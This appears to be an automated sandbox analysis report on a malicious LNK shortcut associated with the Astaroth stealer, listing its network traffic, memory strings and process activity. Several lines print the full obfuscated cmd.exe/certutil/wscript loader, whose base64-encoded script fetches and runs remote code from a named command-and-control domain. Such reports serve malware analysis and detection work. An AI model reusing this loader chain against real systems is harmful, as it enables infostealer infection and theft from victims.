Click to jump to signature section
Source: unknown | HTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.3:49682 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe | Domain query: gwae8.industryinfluence.shop | |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com | |
Source: C:\Windows\System32\wscript.exe | Network Connect: 172.67.221.22 80 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.124.96 443 | Jump to behavior |
Source: Traffic | Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.3:49681 -> 172.67.221.22:80 |
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com |
Source: global traffic | HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gwae8.industryinfluence.shopConnection: Keep-Alive |
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 104.16.124.96 104.16.124.96 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682 |
Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Feb 2023 06:46:05 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=HuxegvGqhPYj.RmC4Z5BvFwAUbphzy6uoWYlMjbn75I-1675233965-0-Aaaf9mQqj3uibNCAaCSZwu7+dUgj+Q0HUsqcC05pF3vk4twZOxrm6f79uC6VSOXzSChkWjNH93sJcyJueQo47SqbhV2WUSbMN6AYB2WG5yRf; path=/; expires=Wed, 01-Feb-23 07:16:05 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=6.0000002122251e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm6%2B2%2FiRNIaRnavKlgeBIJCR2OhRC7bTShI3kSlts9Bq%2F4TeHdgYWVJBiLxcPeIM1sfMbk%2FjhgDxcvV7GOQwTIwA95teLMMeDeK67IhNAo8%2BVCpBOBcm8gzNRgpFUH5GK2A%2FVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnKVGuWQtbjLxL; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:46:05 GMT; HttpOnlyServer: cloudflareCF-RAY: 7928ba5a6cd990ee-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 |
Source: wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hTtP://gwae8.industryinfluence.shop/?3/ |
Source: wscript.exe, 00000003.00000003.257885861.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251546620.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258534912.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251838024.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.252114824.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://gwae8.industryinfluence.shop/ |
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://gwae8.industryinfluence.shop/?3/ |
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://gwae8.industryinfluence.shop/b |
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/ |
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error |
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error& |
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error( |
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error2.L |
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ |
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ.4 |
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/~ |
Source: unknown | DNS traffic detected: queries for: gwae8.industryinfluence.shop |
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com |
Source: global traffic | HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gwae8.industryinfluence.shopConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.3:49682 version: TLS 1.2 |
Source: C:\Windows\System32\certutil.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY! | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 | Jump to behavior |
Source: classification engine | Classification label: mal68.evad.winLNK@6/1@2/2 |
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY! |
Source: LNK file | Process created: C:\Windows\System32\cmd.exe |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer | Jump to behavior |
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@ |
Source: C:\Windows\System32\wscript.exe | Domain query: gwae8.industryinfluence.shop | |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com | |
Source: C:\Windows\System32\wscript.exe | Network Connect: 172.67.221.22 80 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.124.96 443 | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\qxdhvbd\>nul 2>&1 &&s^et xecy=c:\qxdhvbd\^qxdhvbd.^js&&echo dmfyiemxoha9innjiisicii7rde4cd0iaxaikyj0omgio0uxoha9ilqikyj0ucirijoio0dlde9iamvjdchdmthwk0qxoharrte4ccsily9nd2floc5pbmr1c3ryewluzmx1zw5jzs5zag9wlz8zlyipow==>!xecy!&&certutil -f -deco^de !xecy! !xecy!&&ca^ll !xecy! |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |